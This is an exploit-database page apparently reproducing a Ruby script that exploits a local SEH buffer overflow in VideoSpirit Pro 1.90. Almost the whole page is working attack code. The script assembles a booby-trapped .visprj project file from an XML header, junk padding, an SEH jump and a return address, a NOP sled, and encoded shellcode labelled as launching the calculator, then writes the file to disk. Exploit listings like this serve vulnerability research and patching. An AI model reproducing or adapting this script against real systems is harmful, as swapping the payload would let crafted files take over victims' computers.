VideoSpirit Pro 1.90 SEH Buffer Overflow

2013.11.13
Credit: metacom
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

#!/usr/bin/ruby #Vendor: http://www.verytools.com/ #Software link: http://www.verytools.com/videospirit/download.html print ''' VideoSpirit Pro Seh Buffer Overflow Version: Pro 1.90 Date found: 11.11.2013 Exploit Author: metacom Tested on: Win7-Win8-WinXp-Sp3-EN ''' sleep(3) head=("\x3C\x76\x65\x72\x73\x69\x6F\x6E\x20\x76\x61\x6C\x75\x65\x3D\x22\x33\x22\x20"+ "\x2F\x3E\x0A\x3C\x74\x72\x61\x63\x6B\x3E\x0A\x20\x20\x20\x20\x3C\x74\x79\x70"+ "\x65\x20\x76\x61\x6C\x75\x65\x3D\x22\x30\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20"+ "\x3C\x74\x79\x70\x65\x20\x76\x61\x6C\x75\x65\x3D\x22\x34\x22\x20\x2F\x3E\x0A"+ "\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x20\x76\x61\x6C\x75\x65\x3D\x22\x32\x22"+ "\x20\x2F\x3E\x0A\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x20\x76\x61\x6C\x75\x65"+ "\x3D\x22\x31\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x20\x76"+ "\x61\x6C\x75\x65\x3D\x22\x37\x22\x20\x2F\x3E\x0A\x3C\x2F\x74\x72\x61\x63\x6B"+ "\x3E\x0A\x3C\x74\x72\x61\x63\x6B\x30\x20\x2F\x3E\x0A\x3C\x74\x72\x61\x63\x6B"+ "\x31\x20\x2F\x3E\x0A\x3C\x74\x72\x61\x63\x6B\x32\x20\x2F\x3E\x0A\x3C\x74\x72"+ "\x61\x63\x6B\x33\x20\x2F\x3E\x0A\x3C\x74\x72\x61\x63\x6B\x34\x20\x2F\x3E\x0A"+ "\x3C\x63\x6C\x69\x70\x20\x2F\x3E\x0A\x3C\x6F\x75\x74\x70\x75\x74\x20\x74\x79"+ "\x70\x65\x6E\x61\x6D\x65\x3D\x22\x41\x56\x49\x22\x20\x6B\x65\x65\x70\x61\x73"+ "\x70\x65\x63\x74\x3D\x22\x30\x22\x20\x70\x72\x65\x73\x65\x74\x71\x75\x61\x6C"+ "\x69\x74\x79\x3D\x22\x30\x22\x3E\x0A\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x30"+ "\x20\x65\x6E\x61\x62\x6C\x65\x3D\x22\x31\x22\x3E\x0A\x20\x20\x20\x20\x20\x20"+ "\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x73"+ "\x6D\x70\x65\x67\x34\x76\x32\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x6D\x73\x6D"+ "\x70\x65\x67\x34\x76\x32\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20"+ "\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x33\x32\x30\x2A"+ "\x32\x34\x30\x28\x34\x3A\x33\x29\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x33\x32"+ "\x30\x2A\x32\x34\x30\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C"+ "\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x33\x30\x22\x20\x76"+ "\x61\x6C\x75\x65\x3D\x22\x33\x30\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20"+ "\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x31\x36"+ "\x30\x30\x30\x6B\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x31\x36\x30\x30\x30\x6B"+ "\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x3C\x2F\x74\x79\x70\x65\x30\x3E\x0A\x20"+ "\x20\x20\x20\x3C\x74\x79\x70\x65\x31\x20\x65\x6E\x61\x62\x6C\x65\x3D\x22\x31"+ "\x22\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D"+ "\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x70\x33\x22\x20\x76\x61\x6C\x75\x65\x3D\x22") junk="\x41" * 104 junk+="\xeb\x0c\xff\xff" # jump junk+=[0x10113FD3].pack('V')# 10113FD3 5F POP EDI junk+="\x90" * 80 # landing zone junk+=("\xb8\xb8\xd3\x62\x62\xd9\xcf\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"+ "\x33\x83\xea\xfc\x31\x42\x0e\x03\xfa\xdd\x80\x97\x06\x09\xcd"+ "\x58\xf6\xca\xae\xd1\x13\xfb\xfc\x86\x50\xae\x30\xcc\x34\x43"+ "\xba\x80\xac\xd0\xce\x0c\xc3\x51\x64\x6b\xea\x62\x48\xb3\xa0"+ "\xa1\xca\x4f\xba\xf5\x2c\x71\x75\x08\x2c\xb6\x6b\xe3\x7c\x6f"+ # Calc Shellcode "\xe0\x56\x91\x04\xb4\x6a\x90\xca\xb3\xd3\xea\x6f\x03\xa7\x40"+ # Bad Characters "\x71\x53\x18\xde\x39\x4b\x12\xb8\x99\x6a\xf7\xda\xe6\x25\x7c"+ # \x00\x0a\x0d\x1a\x21\x22\x26 "\x28\x9c\xb4\x54\x60\x5d\x87\x98\x2f\x60\x28\x15\x31\xa4\x8e"+ "\xc6\x44\xde\xed\x7b\x5f\x25\x8c\xa7\xea\xb8\x36\x23\x4c\x19"+ "\xc7\xe0\x0b\xea\xcb\x4d\x5f\xb4\xcf\x50\x8c\xce\xeb\xd9\x33"+ "\x01\x7a\x99\x17\x85\x27\x79\x39\x9c\x8d\x2c\x46\xfe\x69\x90"+ "\xe2\x74\x9b\xc5\x95\xd6\xf1\x18\x17\x6d\xbc\x1b\x27\x6e\xee"+ "\x73\x16\xe5\x61\x03\xa7\x2c\xc6\xfb\xed\x6d\x6e\x94\xab\xe7"+ "\x33\xf9\x4b\xd2\x77\x04\xc8\xd7\x07\xf3\xd0\x9d\x02\xbf\x56"+ "\x4d\x7e\xd0\x32\x71\x2d\xd1\x16\x12\xb0\x41\xfa\xfb\x57\xe2"+ "\x99\x03") junk+="\xCC" * 4500 footer=("\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x76\x61\x6C\x69\x74\x65"+ "\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x31\x32\x38\x6B\x22\x20\x76\x61\x6C\x75\x65\x3D"+ "\x22\x31\x32\x38\x6B\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x76"+ "\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x34\x34\x31\x30\x30\x22\x20"+ "\x76\x61\x6C\x75\x65\x3D\x22\x34\x34\x31\x30\x30\x22\x20\x2F\x3E\x0A\x20\x20\x20"+ "\x20\x20\x20\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22"+ "\x32\x20\x28\x53\x74\x65\x72\x65\x6F\x29\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x32"+ "\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x3C\x2F\x74\x79\x70\x65\x31\x3E\x0A\x20\x20"+ "\x20\x20\x3C\x74\x79\x70\x65\x32\x20\x65\x6E\x61\x62\x6C\x65\x3D\x22\x30\x22\x20"+ "\x2F\x3E\x0A\x3C\x2F\x6F\x75\x74\x70\x75\x74\x3E") off= head + junk + footer print "\t\t[+]Creating Exploit File...\n" sleep(1) begin File.open("Exploit.visprj","wb") do |f| f.write off f.close print "\t\t[+]File Exploit.visprj create successfully.\n" sleep(1) end rescue print "**[-]Error: #{$!}\n" exit(0) end


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top